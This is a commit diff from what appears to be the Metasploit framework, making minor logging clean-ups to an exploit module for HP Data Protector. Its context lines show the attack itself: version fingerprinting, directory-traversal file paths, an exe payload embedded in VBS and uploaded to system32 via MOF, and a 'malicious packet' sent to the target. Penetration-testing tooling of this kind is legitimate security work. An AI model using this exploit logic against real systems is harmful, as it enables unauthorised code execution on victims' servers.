Add minor clean up
parent
f3c912bd32
commit
eaf1b0caf6
|
@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
return Exploit::CheckCode::Unknown
|
return Exploit::CheckCode::Unknown
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("HP Data Protector version #{fingerprint}")
|
print_status("#{peer} - HP Data Protector version #{fingerprint}")
|
||||||
|
|
||||||
if fingerprint =~ /HP Data Protector A\.06\.(\d+)/
|
if fingerprint =~ /HP Data Protector A\.06\.(\d+)/
|
||||||
minor = $1.to_i
|
minor = $1.to_i
|
||||||
|
@ -92,6 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
|
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
|
||||||
mof = generate_mof(mof_name, vbs_name)
|
mof = generate_mof(mof_name, vbs_name)
|
||||||
|
|
||||||
|
# We can't upload binary contents, so embedding the exe into a VBS.
|
||||||
print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{vbs_name}")
|
print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{vbs_name}")
|
||||||
res = upload_file("windows\\system32\\#{vbs_name}", vbs)
|
res = upload_file("windows\\system32\\#{vbs_name}", vbs)
|
||||||
|
|
||||||
|
@ -158,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
"\\..\\..\\..\\..\\..\\#{file_name}", # rissServerCertificate
|
"\\..\\..\\..\\..\\..\\#{file_name}", # rissServerCertificate
|
||||||
contents # Certificate contents
|
contents # Certificate contents
|
||||||
])
|
])
|
||||||
print_status("Sending malicious packet with opcode 42...")
|
vprint_status("#{peer} - Sending malicious packet with opcode 42...")
|
||||||
sock.put(pkt)
|
sock.put(pkt)
|
||||||
res = sock.get_once
|
res = sock.get_once
|
||||||
disconnect
|
disconnect
|
||||||
|
|
Loading…
Reference in New Issue